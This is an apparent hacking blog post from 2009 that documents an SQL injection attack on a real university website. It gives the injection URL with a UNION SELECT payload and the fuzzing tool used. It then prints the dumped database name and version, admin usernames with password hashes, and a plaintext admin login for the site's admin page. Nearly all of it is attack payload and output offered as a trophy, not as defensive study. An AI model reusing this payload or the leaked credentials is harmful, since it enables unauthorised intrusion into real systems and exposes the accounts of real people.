[SQLi] http://www.ukb.ac.id ~ viperfx07 blog (hack + crack + web + app)

Friday, January 16, 2009

[SQLi] http://www.ukb.ac.id

10:57 PM Posted by viperfx07 hacking No comments

Tool = schemafuzz.py v5.0 mod by me
Admin page = http://www.ukb.ac.id/admin/
Admin usr:pwd = saropi:saropi


[+] URL: http://www.ukb.ac.id/detail_berita.php?id=15+AND+1=2+UNION+SELECT+0,sqli,2,3,4--
[+] Evasion Used: "+" "--"
[+] 22:52:20
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
 Database: ukb_dbaseukb
 User: ukb_dbaseukb@localhost
 Version: 4.0.26-standard-log
[+] Dumping data from database "ukb_dbaseukb" Table "admin"
[+] and Column(s) ['username', 'password']
[+] Number of Rows: 2

[0] saropi:335c20f320d1f837a27e887c33044044:
[1] admin:fe8268e1262102afb740325a7c9706bb:
[2] No data

[-] 22:52:24
[-] Total URL Requests 4
[-] Done

viperfx07 blog (hack + crack + web + app)

viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Friday, January 16, 2009

[SQLi] http://www.ukb.ac.id

0 comments:

Post a Comment